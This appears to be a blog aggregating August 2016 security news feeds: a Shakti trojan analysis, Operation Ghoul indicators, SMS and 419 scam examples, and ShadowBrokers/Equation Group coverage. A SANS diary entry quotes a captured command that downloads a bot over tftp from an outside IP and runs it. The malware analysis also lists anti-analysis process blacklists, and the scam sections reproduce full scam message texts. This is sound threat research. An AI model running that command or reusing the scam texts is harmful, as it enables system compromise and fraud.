It looks like 194.165.16.0/24 is the new 85.93.0.0/24 #EITest http://pic.twitter.com/Hfr7auumpO
— Kafeine (@kafeine) August 30, 2016
https://t.co/Hfr7auumpO from Twitter https://twitter.com/kafeine
Tuesday, August 30, 2016
Wednesday, August 17, 2016
Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. FCC complaint: Baltimore police phone trackers disrupt calls
from Security News - Software vulnerabilities, data leaks, malware, viruses
Civil rights groups filed a federal complaint against the Baltimore Police Department's use of a portable technology that mimics cell towers to locate suspects and their cell phones.
Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. Hacking the hackers? US spy agency at center of apparent breach
from Security News - Software vulnerabilities, data leaks, malware, viruses
The US National Security Agency, which gained international notoriety in 2013 after Edward Snowden revealed its data snooping techniques, has itself become the target of an apparent data breach.
Feedly:We Live Security. Nemucod now spreading banking trojans in Brazil
from We Live Security
On the morning of Friday August 12th, ESET researchers noticed a huge outbreak of a new Spy.Banker variant, detected as Spy.Banker.ADEA. It happened at around 12pm CET.
The post Nemucod now spreading banking trojans in Brazil appeared first on WeLiveSecurity.
Feedly:Understanding Java Code and Malware | Malwarebytes Unpacked. Shakti Trojan: Technical Analysis
from Understanding Java Code and Malware | Malwarebytes Unpacked
Recently, we took a look at the interesting Trojan found by Bleeping Computer. Our small investigation on its background and possible attribution has led us to the conclusion that this threat is in reality not new – probably it has been designed in 2012 for the purpose of corporate espionage operations. Yet it escaped from the radar and haven’t been described so far. More about that research, as well as the behavioral analysis of the malware, you can find in the article Shakti Trojan: Document Thief.
In contrary to the first part, this post will be a deep dive in the used techniques.
Analyzed samples
Recent sample mentioned by Bleeping Computer:
- b1380af637b4011e674644e0a1a53a64: main executable
- bc05977b3f543ac1388c821274cbd22e: Carrier.dll
- 7d0ebb99055e931e03f7981843fdb540: Payload.dll
- C&C: web4solution.net
Other found samples:
- 8ea35293cbb0712a520c7b89059d5a2a: submitted to VirusTotal in 2013
- C&C: securedesignus.com
- 6992370821f8fbeea4a96f7be8015967: submitted to VirusTotal in 2014
- C&C: securedesignuk.com
- d9181d69c40fc95d7d27448f5ece1878: submitted to VirusTotal in 2015
- CnC: web4solution.net
Inside the main executable
The main executable is a loader responsible for unpacking and deploying the core malicious modules. Often, malware distributors use ready-made underground crypters to pack and protect their bots. After unpacking that first layer, we usually get a fully independent PE file.
In this case it is slightly different. The main loader looks like it is prepared exclusively for this particular bot (rather than being a commercial crypter).
In resources we can find content obfuscated by XOR with 0x97:
This content is loaded and decoded during malware execution. The author tried to obfuscate the XOR operation performed on the buffer by splitting it into three and hiding in between redundant API calls:
byte ^ 0x97 = byte ^ (0xc7 ^ 0xe7 ^ 0xb7)
After decoding the buffer, we find that it is a Trojan’s configuration file, which contains the following strings:
EA20E48B6CBC1134DCC52B9CD23479C7
web4solution.net
{40f550c2-a844-49e6-ba74-ded0ab840d5b}
igfxtray
JUpdate
Java Update Service
The first string of the configuration:
EA20E48B6CBC1134DCC52B9CD23479C7 -> md5("HEMAN")
must match the one hardcoded in the executable:
Another curious fact about this executable is a huge overlay. Below you can see the size of the overlay (at the end of the file) versus the size of the space consumed by the main executable’s sections:
As we found out, two more (encrypted) PE files are hidden in this space. In order to decode them and deploy, the application reads its own file into a newly allocated memory.
Those two hidden modules are, appropriately: Carrier.dll and Payload.dll.
Flow obfuscation
This Trojan utilizes some techniques of flow obfuscation. Among them, there is an interesting trick of redirecting execution to the new module – via DOS header. It takes the following steps:
1) The new PE file is unpacked into a newly allocated memory block. Address to its beginning is stored. Below we can see the main executable making a call to such address. This way, it is redirecting execution flow to the beginning of Carrier.dll:
As we can see above, the main module passes to the Carrier.dll some additional parameters: handle to the decrypted configuration and a magic constant (0x0DEFACED) that will be used further by the DLL as a marker for searching parameters on the stack.
2) The bytes of the DOS header are being interpreted as code and executed:
3) Execution of the DOS header leads to calling a function inside the code section of the same module:
In the analyzed case the called function is ReflectiveLoader – a stub of a well-known technique allowing to easily map any PE file into memory (you can read more about this technique here).
Reflective Loader is responsible for doing all the actions that Windows Loader would do if the DLL was loaded in a typical way. After mapping the module it calls its entry point:
Carrier.dll
Carrier is responsible for checking the environment, installing, and deploying the bot.
It exports one function: ReflectiveLoader that was mentioned before:
Execution of the important code starts in the DllMain. First, the DLL searches the magic constant on the stack, and with its help retrieves the handle to the configuration:
Found handle to the configuration:
If the handle is successfully retrieved (like in the example above), execution proceeds with environment check and, eventually, bot installation is deployed:
Defensive techniques
Before performing the installation, the Trojan checks the environment in order to defend itself from being analyzed. If any of the defined symptoms are found, the program terminates. Here’s how it proceeds:
1) Uses standard function IsDebuggerPresent to check if it is not being debugged
2) Checks names of the running processes against the blacklist:
"VBoxService" "VBoxTray" "VMware" "VirtualPC" "wireshark"
3) Tries to load library SbitDll.dll (to check against sandbox)
4) Tries to find a window from the blacklist:
"SandboxieControlWndClass" "Afx:400000:0"
If the check passes and no tools used for analysis have been detected, the program proceeds with installation.
Installation
Before deciding which variant of the installation to use, the application checks the privileges with which it is deployed. If it has administrator rights, it attempts to install itself as a service. The name of created service is given in a configuration (mentioned before). In the described case it is Java Update Service.
If this variant of achieving persistence is not possible, the application injects itself into a browser.
Injection in a browser is a good way to cover the operation of uploading files. The process of a browser connecting to the Internet and generating traffic does not look suspicious at first. Also, if the victim system uses a whitelist of applications that can connect to the Internet, the probability that a browser is classified as trusted is very high.
First, it checks if any of the following browsers are already running in the system: chrome.exe, firefox.exe, opera.exe.
Enumerating processes:
Searching the names of browsers among the opened processes:
If it finds the appropriate process running, it injects itself as a new thread.
If no browser is running, it tries another way: finding the default browser, deploying it, and then injecting itself inside. In order to find out which browser is installed as a default in the particular system, it reads the registry key HKEY_CLASSES_ROOT\HTTP\open\command and finds the application that is triggered.
Having this information, it deploys the found browser as suspended, maps there it’s own code and starts a in a remote thread.
Payload.dll
Payload is the piece responsible for carrying the main mission of stealing files.
This module is a DLL exporting two functions (one of them is also ReflectiveLoader):
Execution starts in the function Init that is called from inside DllMain. To prevent being deployed more than once, the program uses a mutex with the hardcoded name CStmtMan.
Bot attacks all the fixed drives:
It searches for files with the following extensions:
inp, sql, pdf, rtf, txt, xlsx, xls, pptx, ppt, docx, doc
The list of found files is passed to the thread responsible for reading them and sending to the C&C.
Internet connection is opened with a hardcoded user agent string: “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)” – that was used by Internet Explorer 7 on Windows XP SP2 – confirming the hypothesis that the bot has been written several years ago.
While the address of the server is read from configuration, the subpath /external/update is hardcoded:
Conclusion
The code is not very sophisticated, yet it’s effective—probably written by a person/team with some knowledge of malware development. We can see simple obfuscation and well-known injection methods used for reasonable goals (deploying network activity under the cover of a browser). There are some weaknesses in the implementation and lack of optimization (sending open text not compressed or encrypted, user agent string doesn’t match the deployed browser, etc). The unpolished design may suggest that the samples were released/sold in the early stages of development
Over the years, the bot didn’t got any major improvements. It leads to conclude that the distributor of the malware may not be the same entity as the author. Analysis of the C&Cs depicts that it was used by a single threat actor – so probability is high, that this tool has been ordered by the actor from an external programmer, for the purpose of small espionage campaigns.
This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: http://ift.tt/1R6Y8zL.
Feedly:Understanding Java Code and Malware | Malwarebytes Unpacked. Parents, beware of this SMS scam
from Understanding Java Code and Malware | Malwarebytes Unpacked
We’ve recently been alerted to a scam circulating within the UK and causing distress to parents or adults who knows someone by the name of “Sarah”.
The scam comes in the form of an SMS, which contains a message stating that “Sarah”, the purported sender, has been in a “small accident” and is asking the recipient to text back once they’ve received her message. The Teignmouth Police in Devon has shared the below tweet from someone who appears to have encountered the message himself:
The “Sarah” message reads:
Hi it’s Sarah, I need you to do me a favour if possible. I had a small accident and broke my fibula & left elbow. Can you text me back once you get this message x
Based on the number flashed on the above tweet, we found that this particular message may have been in circulation since April of this year. This number has also been tied to several cases of unsolicited calls to random users.
It’s also reported that some may receive a longer and potentially more believable version of the the scam message, which are as follows, but are vague about who the actual senders are:
Mum i did try and phone from some else phone signal is really bad, there has been a terrible car accident. I’m in the ICU ward in hospital my phone ain’t switching on and needs charging. I’m on this mobile number please make sure you reply to this number, my friend didn’t make it he died before we got to hospital and his sister’s fighting for her life. Mum i had my seatbelt on, i’ve got a head injury but i’m ok. Going into Xray to be seen, please make sure you message me back and don’t phone cause mobile phones aren’t allowed here so please text in case I’m in there. I will go outside and phone you mum its really bad i need you to do me favour before it’s too late, as soon as you get my text please reply by text i need you to do me a favour mum, time is running out and i need you to do something mum
I'm on this mobile number please make sure you reply to this number, my friend didn't make it he died before we got to hospital and his sister's fighting for her life. Mum I had my seatbelt on, I've got a head injury but I'm ok. Going into Xray to be seen, please make sure you message me back and don't phone cause mobile phones aren't allowed here so please text in case I'm in there.
Other versions may still be in circulation at this time of writing.
SMS scams are not unheard of in the UK, and they use various social engineering tactics: some promise users with video games, glamour videos, and adult material, some simply wants to “catch up,” and some are designed to trick recipients into giving up their online account credentials, even two-factor verification codes. This particular scam is a great new addition to the SMS scam list in the UK, yet it’s not something we haven’t seen before elsewhere.
Three years ago, we were alerted with a similar SMS scam campaign in the Philippines, with the purported sender asking for top up so he/she can make an emergency call.
Those who receive SMS messages from numbers not in their phone contacts may feel compelled to respond, but it is always best to err on the side of caution. Nowadays, merely replying to such messages could cost the recipient a certain amount of money, which they may not be able to get back. If the sender purports to be someone you know—in this case, “Sarah”—it is best to contact this person’s phone number directly even if “she” told you not to.
Parents, if you receive an SMS message similar to what we have featured here, first make sure you’re calm before thinking of contacting the purported sender. Be aware that scammers playing on fear are out there and are always on the lookout for new targets whom they can squeeze out money from. And second, contact your child’s phone directly to make sure they’re fine. This way, you can easily thwart this type of SMS scam.
Important links:
- Ofcom’s page on Spam texts
- ActionFraud’s online fraud reporting tool
- SMS scams: How to defend yourself
Jovi Umawing
Feedly:Securelist / All Updates. Operation Ghoul: targeted attacks on industrial and engineering organizations
from Securelist / All Updates
Introduction
Kaspersky Lab has observed new waves of attacks that started on the 8th and the 27th of June 2016. These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions. The attackers try to lure targets through spear phishing emails that include compressed executables. The malware collects all data such as passwords, keystrokes and screenshots, then sends it to the attackers.
#OpGhoul targeting industrial, manufacturing and engineering organizations in 30+ countries
Tweet
We found that the group behind this campaign targeted mainly industrial, engineering and manufacturing organizations in more than 30 countries. In total, over 130 organizations have been identified as victims of this campaign. Using the Kaspersky Security Network (KSN) and artifacts from malware files and attack sites, we were able to trace the attacks back to March 2015. Noteworthy is that since the beginning of their activities, the attackers’ motivations are apparently financial, whether through the victims’ banking accounts or through selling their intellectual property to interested parties, most infiltrated victim organizations are considered SMBs (Small to Medium size businesses, 30-300 employees), the utilization of commercial off-the-shelf malware makes the attribution of the attacks more difficult.
In total, over 130 organizations have been identified as victims of Operation Ghoul #OpGhoul
Tweet
In ancient Folklore, the Ghoul is an evil spirit associated with consuming human flesh and hunting kids, originally a Mesopotamian demon. Today, the term is sometimes used to describe a greedy or materialistic individual.
Main infection vector: malicious emails
The following picture represents emails that are being used to deliver malware to the victims, in what looks like a payment document. The e-mails sent by attackers appear to be coming from a bank in the UAE, the Emirates NBD, and include a 7z file with malware. In other cases, victims received phishing links. A quick analysis of the email headers reveals fake sources being utilised to deliver the emails to victims.
Malicious attachments
In the case of spear phishing emails with an attachment, the 7z does not contain payment instructions but a malware executable (EmiratesNBD_ADVICE.exe). We have observed executables with the following MD5s:
Malware MD5 hashes
fc8da575077ae3db4f9b5991ae67dab1
b8f6e6a0cb1bcf1f100b8d8ee5cccc4c
08c18d38809910667bbed747b2746201
55358155f96b67879938fe1a14a00dd6
Email file MD5 hashes
5f684750129e83b9b47dc53c96770e09
460e18f5ae3e3eb38f8cae911d447590
The spear phishing emails are mostly sent to senior members and executives of targeted organizations, most likely because the attackers hope to get access to core intelligence, controlling accounts and other interesting information from people who have the following positions or similar:
- Chief Executive Officer
- Chief Operations Officer
- General Manager
- General Manager, Sales and Marketing
- Deputy General Manager
- Finance and Admin Manager
- Business Development Manager
- Manager
- Export manager
- Finance Manager
- Purchase manager
- Head of Logistics
- Sales Executive
- Supervisor
- Engineer
Technical details
Malware functionality
The malware is based on the Hawkeye commercial spyware, which provides a variety of tools for the attackers, in addition to malware anonymity from attribution. It initiates by self-deploying and configuring persistence, while using anti-debugging and timeout techniques, then starts collecting interesting data from the victim’s device, including:
- Keystrokes
- Clipboard data
- FileZilla ftp server credentials
- Account data from local browsers
- Account data from local messaging clients (Paltalk, Google talk, AIM…)
- Account data from local email clients (Outlook, Windows Live mail…)
- License information of some installed applications
#OpGhoul malware collects all data such as #passwords, keystrokes and screenshots
Tweet
Data exfiltration
Data is collected by the attackers using primarily:
Http GET posts
- Sent to hxxp://192.169.82.86
Email messages
- mail.ozlercelikkapi[.]com (37.230.110.53), mail to info@ozlercelikkapi[.]com
- mail.eminenture[.]com (192.185.140.232), mail to eminfo@eminenture[.]com
Both ozlercelikkapi[.]com and eminenture[.]com seem to belong to compromised organisations operating in manufacturing and technology services.
Malware command center
The malware connects to 192.169.82.86 to deliver collected information from the victim’s PC. This information includes passwords, clipboard data, screenshots…
hxxp://192.169.82.86/~loftyco/skool/login.php
hxxp://192.169.82.86/~loftyco/okilo/login.php
The IP address 192.169.82.86 seems to belong to a compromised device running multiple malware campaigns.
Victim information
Victim organizations are distributed in different countries worldwide with attackers focused on certain countries more than others:
Number of Victim Organisations by Country
Countries marked as “others” have less than three victim organizations each, they are: Switzerland, Gibraltar, USA, Sweden, China, France, Azerbaijan, Iraq, Turkey, Romania, Iran, Iraq and Italy.
Victim industry information
Victim industry types were also indicators of targeted attacks as attackers were looking to infiltrate organizations that belong to the product life cycle of multiple goods, especially industrial equipment.
#Manufacturing #transportation #travel targets of #OpGhoul
Tweet
Number of Victim Organizations by Industry Type
Victim industry description
| Industrial | Petrochemical, naval, military, aerospace, heavy machinery, solar energy, steel, pumps, plastics |
| Engineering | Construction, architecture, automation, chemical, transport, water |
| Shipping | International freight shipping |
| Pharmaceutical | Production/research of pharmaceutical and beauty products |
| Manufacturing | Furniture, decor, textiles |
| Trading | Industrial, electronics and food trading |
| Education | Training centers, universities, academic publishing |
| Tourism | Travel agencies |
| Technology/IT | Providers of IT technologies and consulting services |
| Unknown | Unidentified victims |
The last attack waves
Kaspersky Lab user statistics indicate the new waves of attacks that started in June 2016 are focused on certain countries more than others.
#opghoul highly active in #MiddleEast
Tweet
Hundreds of detections have been reported by Kaspersky Lab users; 70% of the attacked users were found in the United Arab Emirates alone, the other 30% were distributed in Russia, Malaysia, India, Jordan, Lebanon, Turkey, Algeria, Germany, Iran, Egypt, Japan, Switzerland, Bahrain and Tunisia.
Other attack information
Phishing pages have also been spotted through 192.169.82.86, and although they are taken down quickly, more than 150 user accounts were identified as victims of the phishing links sent by the attackers. Victims were connecting from the following devices and inserting their credentials, a reminder that phishing attacks do work on all platforms:
- Windows
- Mac OS X
- Ubuntu
- iPhone
- Android
The malware files are detected using the following heuristic signatures:
Trojan.MSIL.ShopBot.ww
Trojan.Win32.Fsysna.dfah
Trojan.Win32.Generic
Conclusion
Operation Ghoul is one of the many attacks in the wild targeting industrial, manufacturing and engineering organizations, Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments. In addition, privileged users need to be well trained and ready to deal with cyber threats; failure in this is, in most cases, the cause behind private or corporate data leakage, reputation and financial loss.
Indicators of Compromise
The following are common among the different malware infections; the presence of these is an indication of a possible infection.
Filenames and paths related to malware
C:\Users\%UserName%\AppData\Local\Microsoft\Windows\bthserv.exe
C:\Users\%UserName%\AppData\Local\Microsoft\Windows\BsBhvScan.exe
C:\Users\%UserName%\AppData\Local\Client\WinHttpAutoProxySync.exe
C:\Users\%UserName%\AppData\Local\Client\WdiServiceHost.exe
C:\Users\%UserName%\AppData\Local\Temp\AF7B1841C6A70C858E3201422E2D0BEA.dat
C:\Users\%UserName%\AppData\Roaming\Helper\Browser.txt
C:\Users\%UserName%\AppData\Roaming\Helper\Mail.txt
C:\Users\%UserName%\AppData\Roaming\Helper\Mess.txt
C:\Users\%UserName%\AppData\Roaming\Helper\OS.txt
C:\ProgramData\Mails.txt
C:\ProgramData\Browsers.txt
List of malware related MD5 hashes
55358155f96b67879938fe1a14a00dd6
f9ef50c53a10db09fc78c123a95e8eec
b8f6e6a0cb1bcf1f100b8d8ee5cccc4c
07b105f15010b8c99d7d727ff3a9e70f
ae2a78473d4544ed2acd46af2e09633d
21ea64157c84ef6b0451513d0d11d02e
08c18d38809910667bbed747b2746201
fc8da575077ae3db4f9b5991ae67dab1
8d46ee2d141176e9543dea9bf1c079c8
36a9ae8c6d32599f21c9d1725485f1a3
cc6926cde42c6e29e96474f740d12a78
6e959ccb692668e70780ff92757d2335
3664d7150ac98571e7b5652fd7e44085
d87d26309ef01b162882ee5069dc0bde
5a97d62dc84ede64846ea4f3ad4d2f93
5a68f149c193715d13a361732f5adaa1
dabc47df7ae7d921f18faf685c367889
aaee8ba81bee3deb1c95bd3aaa6b13d7
460e18f5ae3e3eb38f8cae911d447590
c3cf7b29426b9749ece1465a4ab4259e
List of malware related domains
Indyproject[.]org
Studiousb[.]com
copylines[.]biz
Glazeautocaree[.]com
Brokelimiteds[.]in
meedlifespeed[.]com
468213579[.]com
468213579[.]com
357912468[.]com
aboranian[.]com
apple-recovery[.]us
security-block[.]com
com-wn[.]in
f444c4f547116bfd052461b0b3ab1bc2b445a[.]com
deluxepharmacy[.]net
katynew[.]pw
Mercadojs[.]com
Observed phishing URLs
http://ift.tt/2bbT93A
http://ift.tt/2b00DUc
http://ift.tt/2bbRknv
http://ift.tt/2aZZQ5I
hxxp://192.169.82.86/~gurgenle/verify/webmail/
http://ift.tt/2aZZMmy
http://ift.tt/2bbSi2Z
http://ift.tt/2b0050y
http://ift.tt/2bbRGKW
hxxp://https.portal.apple.com.idmswebauth.login.html.appidkey.05c7e09b5896b0334b3af1139274f266b2hxxp://2b68.f444c4f547116bfd052461b0b3ab1bc2b445a[.]com/login.html
http://ift.tt/2bbS9Nd
Other malware links
Malware links observed on 192.169.82.86 dating back to March and April 2016:
http://ift.tt/2b00P60
http://ift.tt/2bbRmvD
http://ift.tt/2b00rnZ
http://ift.tt/2bbRMSv
http://ift.tt/2aZZXhM
http://ift.tt/2bbStvm
http://ift.tt/2b00kZm
http://ift.tt/2bbRBa2
http://ift.tt/2b00vEn
For more information on how you can protect your business from similar attacks, please visit this post from Kaspersky Business.
Feedly:Fortinet Blog | News and Threat Research - All Posts. JBifrost: Yet Another Incarnation of the Adwind RAT
from Fortinet Blog | News and Threat Research - All Posts
The Adwind Remote Access Trojan (RAT) is a popular Java-based backdoor capable of infecting Windows, Linux, Mac OS and Android operating systems. Its cross-platform nature, elaborate backdoor features, and relatively cheap price makes it a favourite choice for many cybercriminals today. Earlier this year, it was reported that Adwind was used in at least 443,000 attacks. Adwind has rebranded itself multiple times in the past, using the names “Frutas,” “AlienSpy,” and “Unrecom,” to name a few. The most recent...
Feedly:contagio. "i am lady" Linux.Lady trojan samples
from contagio
Bitcoin mining malware for Linux servers - samples
Research:
Dr. Web. Linux.LadySample Credit: Tim Strazzere
MD5 list:
0DE8BCA756744F7F2BDB732E3267C3F4
55952F4F41A184503C467141B6171BA7
86AC68E5B09D1C4B157193BB6CB34007
E2CACA9626ED93C3D137FDF494FDAE7C
E9423E072AD5A31A80A31FC1F525D614
Download. Email me if you need the password.
Feedly:Fortinet Blog | News and Threat Research - All Posts. Black Hat US 2016 Wraps Up
from Fortinet Blog | News and Threat Research - All Posts
Black Hat US 2016 Wraps Up Once again, Black Hat US 2016 was held in Las Vegas in the huge Mandalay Bay resort conference center. This is the biggest Black Hat event of the year, and for sure the largest computer security conference as well. In fact, this year it broke its attendance record as its largest USA show in Black Hat’s 19-year history. To give you a better picture, we are talking about more than 15,000 of the most security savvy professionals gathering from all over the world. I spent some time wandering...
Feedly:SANS Internet Storm Center, InfoCON: green. 522 Error Code for the Win, (Wed, Aug 17th)
from SANS Internet Storm Center, InfoCON: green
Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect. So I got our Intern to check bro logs and see what he could find.
>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"
1467159441.247406 192.128.1.216 104.27.182.19 - 522
1467160356.407366 192.128.1.216 104.27.183.19 - 522
1467161271.647320 192.128.1.216 104.27.183.19 - 522
1467163102.087490 192.128.1.216 104.27.183.19 - 522
1467164017.337316 192.128.1.216 104.27.183.19 - 522
1467164932.547084 192.128.1.216 104.27.182.19 - 522
….
1467182323.201685 192.128.1.216 104.27.182.19 - 522
1467183238.447046 192.128.1.216 104.27.183.19 - 522
1467184153.641505 192.128.1.216 104.27.183.19 - 522
1467185068.903194 192.128.1.216 104.27.182.19 - 522
…
There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed bro logs for the day we only had about 200 total lines that matched, so very low noise ratio.
When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot .
cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.
This is certainly something we are going to keep looking at for finding more compromised system.
--
Tom Webb
@twsecblog
Feedly:Publications - The Citizen Lab. Claudio Guarnieri on alleged NSA-affiliated Equation Group hack
from Publications - The Citizen Lab
A group calling itself the “Shadow Brokers” has claimed to have hacked an elite cyberattack group associated with the U.S. National Security Agency (NSA), and is offering the stolen technology to the highest bidder. Equation Group, the alleged victims of the hack, are known to be one of the most advanced hacking groups in the world, according to analysis by security firm Kaspersky. As proof of the hack, a sample of the stolen data has been published.
Security experts have analyzed the sample files put up by Shadow Brokers in order to determine whether it was true, or simply an elaborate hoax. Citizen Lab Senior Research Fellow Claudio Guarnieri told The Wired in an interview that the content does seem legitimate.
“It looks very much as if the NSA attacked someone, and that someone managed to source the origin of the attacks, and counter-hacked them. The content is credible enough and properly reflects what we know of some of the program names in there.” He added that this was not enough to link the code to Equation Group or any other NSA-contracted cyberattack organizations.
Read further coverage from the International Business Times, Infosecurity Magazine, or iTechposts.
The post Claudio Guarnieri on alleged NSA-affiliated Equation Group hack appeared first on The Citizen Lab.
Feedly:Newest Blog Posts | Symantec Connect Community. Equation: Has secretive cyberespionage group been breached?
from Newest Blog Posts | Symantec Connect Community
A new attack group has released a data dump of leaked exploits and hacking tools they claim belong to the Equation group.
Twitter Card Style:
summaryAn attack group calling itself the Shadow Brokers has released a trove of data it claims to have stolen from the Equation cyberespionage group. The data contains a range of exploits and tools they state were used by Equation.
Feedly:Securelist / All Updates. The Equation Giveaway
from Securelist / All Updates
Rare implementation of RC5/RC6 in ‘ShadowBrokers’ dump connects them to Equation malware
August 13, 2016 saw the beginning of a truly bizarre episode. A new identity going under the name ‘ShadowBrokers’ came onto the scene claiming to possess files belonging to the apex predator of the APT world, the Equation Group [PDF]. In their initial leak, the ShadowBrokers claimed the archive was related to the Equation group, however, they didn’t provide any technical details on the connections.
Along with some non-native rants against ‘Wealthy Elites’, the ShadowBrokers provided links to two PGP-encrypted archives. The first was provided for free as a presumptive show of good faith, the second remains encrypted at the time of writing. The passphrase is being ‘auctioned’, but having set the price at 1 million BTC (or 1/15th of the total amount of bitcoin in circulation), we consider this to be optimistic at best, if not ridiculous at face value.
The first archive contains close to 300MBs of firewall exploits, tools, and scripts under cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION. Most files are at least three years old, with change entries pointing to August 2013 the newest timestamp dating to October 2013.
As researchers continue to feast on the release, some have already begun to test the functional capabilities of the exploits with good results.
Having originally uncovered the Equation group in February 2015, we’ve taken a look at the newly released files to check for any connections with the known toolsets used by Equation, such as EQUATIONDRUG, DOUBLEFANTASY, GRAYFISH and FANNY.
While we cannot surmise the attacker’s identity or motivation nor where or how this pilfered trove came to be, we can state that several hundred tools from the leak share a strong connection with our previous findings from the Equation group.
The Devil’s in the Crypto
The Equation group uses the RC5 and RC6 encryption algorithms quite extensively throughout their creations. RC5 and RC6 are two encryption algorithms designed by Ronald Rivest in 1994 and 1998. They are very similar to each other, with RC6 introducing an additional multiplication in the cypher to make it more resistant. Both cyphers use the same key setup mechanism and the same magical constants named P and Q.
The particular RC5/6 implementation from Equation group’s malware is interesting and deserves special attention because of its specifics. Inside the Equation group malware, the encryption library uses a subtract operation with the constant 0x61C88647. In most publicly available RC5/6 code, this constant is usually stored as 0x9E3779B9, which is basically -0x61C88647. Since an addition is faster on certain hardware than a subtraction, it makes sense to store the constant in its negative form and adding it instead of subtracting. In total, we’ve identified 20 different compiled versions of the RC5/6 code in the Equation group malware.
Encryption-related code in a DoubleFantasy (actxprxy32.dll) sample
In the screenshot above, one can observe the main loop of a RC6 key setup subroutine extracted from one of the Equation group samples. The ShadowBrokers’ free trove includes 347 different instances of RC5/RC6 implementations. As shown in the screenshot below, the implementation is functionally identical including the subtraction of the inverted constant 0x61C88647.
Specific RC6 implementation from “BUSURPER-2211-611.exe” (md5: 8f137a9100a9fcc8b512b3729878a373
Comparing the older, known Equation RC6 code and the code used in most of the binaries from the new leak we observe that they are functionally identical and share rare specific traits in their implementation.
In case you’re wondering, this specific RC6 implementation has only been seen before with Equation group malware. There are more than 300 files in the Shadowbrokers’ archive which implement this specific variation of RC6 in 24 different forms. The chances of all these being faked or engineered is highly unlikely.
This code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group. While the ShadowBrokers claimed the data was related to the Equation group, they did not provide any technical evidence of these claims. The highly specific crypto implementation above confirms these allegations.
More details about the ShadowBrokers leak and similarities with Equation group are available to Kaspersky Intelligence Services reports’ subscribers. For more information, email <intelreports@kaspersky.com>
Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. Snowden: Exposure of alleged NSA tools may be warning to US
from Security News - Software vulnerabilities, data leaks, malware, viruses
National Security Agency leaker Edward Snowden says the exposure of malicious software allegedly linked to his former employer may be a message from Moscow.
Feedly:We Live Security. Why security is a transversal issue for video games development
from We Live Security
Santiago Sassone, a senior corporate communications specialist, on why security is a transversal issue for video games development.
The post Why security is a transversal issue for video games development appeared first on WeLiveSecurity.
Feedly:We Live Security. ENISA: Security of Things important for CIIs
from We Live Security
The Security of Things is set to become a key feature in the fight against cybercriminals, according to a new report by ENISA.
The post ENISA: Security of Things important for CIIs appeared first on WeLiveSecurity.
Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. Software maverick McAfee warns China of hacking weakness
from Security News - Software vulnerabilities, data leaks, malware, viruses
China leads the world in connecting everyday devices to the internet, but is creating huge hacking vulnerabilities for itself and others by doing so, renegade American software pioneer John McAfee warned Tuesday.
Feedly:Understanding Java Code and Malware | Malwarebytes Unpacked. Soldiering on: the $5.6 million 419 scam
from Understanding Java Code and Malware | Malwarebytes Unpacked
419 scams most commonly drop into your mailbox, but they do occasionally appear via other channels such as snail mail and social media. Today we’re going to take a look at an angle seemingly beloved of scammers everywhere – a specific character type clung to down the years for no other reason than to cheat people out of their money. That character would happen to be “awesome UN peacekeeper with inexplicable access to millions of dollars because reasons”.
The name used tends to be drawn from a small pool, alongside a specific selection of rotated photographs to “prove” the identity of the fictitious soldier. Quite often, those photographs – and occasionally names – are of genuine soldiers lifted from military news and interview sites. It doesn’t matter what avenue the scammers decide to roll with – email, social media, dating profiles – this specific approach is a popular one, and they stick to it like glue.
What we have below is the closest thing possible to a default scam character in a 419 videogame.
Our first UN peacekeeping soldier with access to a huge chunk of cash comes in the form of “Victoria”, who is one of the alter-egos for this particular fakeout. Should you follow certain spammy looking Twitter feeds with your account, you’ll probably receive the below DM:
Hello my dear, My name is Victoria I am single woman, I hope all is well with you? I am a soldier who works as a United Nations peace keeping troops in Iraq, the war against terrorism. I have in my possession the sum of $ 5.6 million dollars I made here in Iraq. I deposited his money with an agent of the Red Cross because of the law of the United Nations. I want my stand as beneficiary to receive the fund and keep it safe because I do not trust the Red Cross agent. I want you to help me and keep the money in your savings account so that as soon as they are through with my mission here in Iraq, I will come to you to meet face to face and get to know. I’ll give you 50% of the total money for your assistance after you receive the money. please reply to me, if you are willing to work with me so that I can send you more information on which the money was to keep the Red Cross Agent.Your urgent response is highly necessary. Best regards thanks alot contact me with my email
Here’s an example of the same scam arriving by email, and below is an example of it popping up on a dating site:
The text from the above profile reads as follows:
I hope all is well with you? I am a soldier working as United Nations peace keeping troop in Iraq, on war against terrorism. I have in my possession the sum of 5.6 million USD Which I made here in Iraq. I deposited this money with a Red Cross agent because of the law of UN. I want you to stand as my beneficiary to receive the fund and keep it safe because I don’t trust Red Cross agent. I want you to help me and keep the money save in your account so that as soon as am through with my mission here in Iraq, I will come over to you for us to meet face to face and know each other. I will give you 50 of the total money for your assistance after you have received the money. Please reply back to me here via Email: if you are willing to work with me so that i can send you more information where the money is been keeps by the Red Cross Agent. Your urgent reply is highly needed.
Let’s see…Red Cross, UN, Iraq, millions of dollars…yep, we have a match.
In many situations, members of the military may have the green light to deal with classified documents; unfortunately, one of our clones was a bit confused and ended up in the Bangalore classified ads instead:
Hello [I’m] FROM MOSCOW RUSSIA ARMY SERVING ON PEACE KEEPING IN SYRIA AM VERY BUSY ON DUTY EMAIL MY ID([email redacted]) AM VERY BUSY ON DUTY EMAIL ME FOR A VEERY IMPORTANT DEAL WITH YOU IN YOUR COUNTRY
Scammers have marched their work of fiction from Iraq to Syria, also she’s now Russian because of course she is. I’m going to guess that any email response would probably involve the UN, Red Cross and a large pile of money.
